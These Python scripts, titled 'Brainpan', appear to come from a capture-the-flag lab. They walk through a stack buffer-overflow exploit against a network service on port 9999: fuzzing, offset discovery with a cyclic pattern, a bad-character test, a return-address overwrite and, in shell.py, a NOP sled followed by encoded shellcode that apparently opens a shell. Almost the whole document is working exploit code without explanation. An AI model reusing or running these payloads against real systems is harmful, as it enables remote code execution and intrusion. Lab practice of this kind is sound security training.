Brainpan

a.py

#!/usr/bin/python

import socket
import sys
from time import sleep

buff = "A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('192.168.0.101',9999))
        s.recv(1024)
        s.send(buff)
        s.recv(1024)
        s.close()
        sleep(0.1)
        buff = buff + "A" * 100

    except: 
        print 'Fuzzing crashed at %s bytes' % str(len(buff))
        sys.exit()

msf.py

#!/usr/bin/python

import socket
import sys
from time import sleep

buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba"

while True:
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('192.168.0.105',9999))
        s.recv(1024)
        s.send(buff)
        s.recv(1024)
        s.close()

    except: 
        print 'Fuzzing crashed at %s bytes' % str(len(buff))
        sys.exit()

b.py

#!/usr/bin/python

import socket
import sys
from time import sleep

buff = "A" * 524 + "B" * 4

while True:
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('192.168.0.105',9999))
        s.recv(1024)
        s.send(buff)
        s.recv(1024)
        s.close()

    except: 
        print 'Fuzzing crashed at %s bytes' % str(len(buff))
        sys.exit()

bad.py

#!/usr/bin/python

import socket
import sys
from time import sleep

buff = "A" * 524 + "B" * 4
badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 

while True:
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('192.168.0.105',9999))
        s.recv(1024)
        s.send(buff + badchars)
        s.recv(1024)
        s.close()

    except: 
        print 'Fuzzing crashed at %s bytes' % str(len(buff))
        sys.exit()

mona.py

#!/usr/bin/python

import socket
import sys
from time import sleep

buff = "A" * 524 + "\xf3\x12\x17\x31"

while True:
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('192.168.0.105',9999))
        s.recv(1024)
        s.send(buff)
        s.recv(1024)
        s.close()

    except: 
        print 'Fuzzing crashed at %s bytes' % str(len(buff))
        sys.exit()

shell.py

#!/usr/bin/python

import socket
import sys
from time import sleep

buff = "A" * 524 + "\xf3\x12\x17\x31" + "\x90" * 32
end =  ("\xb8\xa9\x39\xe4\xe3\xd9\xea\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x52\x31\x43\x12\x03\x43\x12\x83\x42\xc5\x06\x16\x68\xde\x45"
"\xd9\x90\x1f\x2a\x53\x75\x2e\x6a\x07\xfe\x01\x5a\x43\x52\xae"
"\x11\x01\x46\x25\x57\x8e\x69\x8e\xd2\xe8\x44\x0f\x4e\xc8\xc7"
"\x93\x8d\x1d\x27\xad\x5d\x50\x26\xea\x80\x99\x7a\xa3\xcf\x0c"
"\x6a\xc0\x9a\x8c\x01\x9a\x0b\x95\xf6\x6b\x2d\xb4\xa9\xe0\x74"
"\x16\x48\x24\x0d\x1f\x52\x29\x28\xe9\xe9\x99\xc6\xe8\x3b\xd0"
"\x27\x46\x02\xdc\xd5\x96\x43\xdb\x05\xed\xbd\x1f\xbb\xf6\x7a"
"\x5d\x67\x72\x98\xc5\xec\x24\x44\xf7\x21\xb2\x0f\xfb\x8e\xb0"
"\x57\x18\x10\x14\xec\x24\x99\x9b\x22\xad\xd9\xbf\xe6\xf5\xba"
"\xde\xbf\x53\x6c\xde\xdf\x3b\xd1\x7a\x94\xd6\x06\xf7\xf7\xbe"
"\xeb\x3a\x07\x3f\x64\x4c\x74\x0d\x2b\xe6\x12\x3d\xa4\x20\xe5"
"\x42\x9f\x95\x79\xbd\x20\xe6\x50\x7a\x74\xb6\xca\xab\xf5\x5d"
"\x0a\x53\x20\xf1\x5a\xfb\x9b\xb2\x0a\xbb\x4b\x5b\x40\x34\xb3"
"\x7b\x6b\x9e\xdc\x16\x96\x49\x23\x4e\x98\xec\xcb\x8d\x98\xf0"
"\x6a\x1b\x7e\x66\x7d\x4d\x29\x1f\xe4\xd4\xa1\xbe\xe9\xc2\xcc"
"\x81\x62\xe1\x31\x4f\x83\x8c\x21\x38\x63\xdb\x1b\xef\x7c\xf1"
"\x33\x73\xee\x9e\xc3\xfa\x13\x09\x94\xab\xe2\x40\x70\x46\x5c"
"\xfb\x66\x9b\x38\xc4\x22\x40\xf9\xcb\xab\x05\x45\xe8\xbb\xd3"
"\x46\xb4\xef\x8b\x10\x62\x59\x6a\xcb\xc4\x33\x24\xa0\x8e\xd3"
"\xb1\x8a\x10\xa5\xbd\xc6\xe6\x49\x0f\xbf\xbe\x76\xa0\x57\x37"
"\x0f\xdc\xc7\xb8\xda\x64\xf7\xf2\x46\xcc\x90\x5a\x13\x4c\xfd"
"\x5c\xce\x93\xf8\xde\xfa\x6b\xff\xff\x8f\x6e\xbb\x47\x7c\x03"
"\xd4\x2d\x82\xb0\xd5\x67")

while True:
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('192.168.0.105',9999))
        s.recv(1024)
        s.send(buff + end)
        s.recv(1024)
        s.close()

    except: 
        print 'Fuzzing crashed at %s bytes' % str(len(buff))
        sys.exit()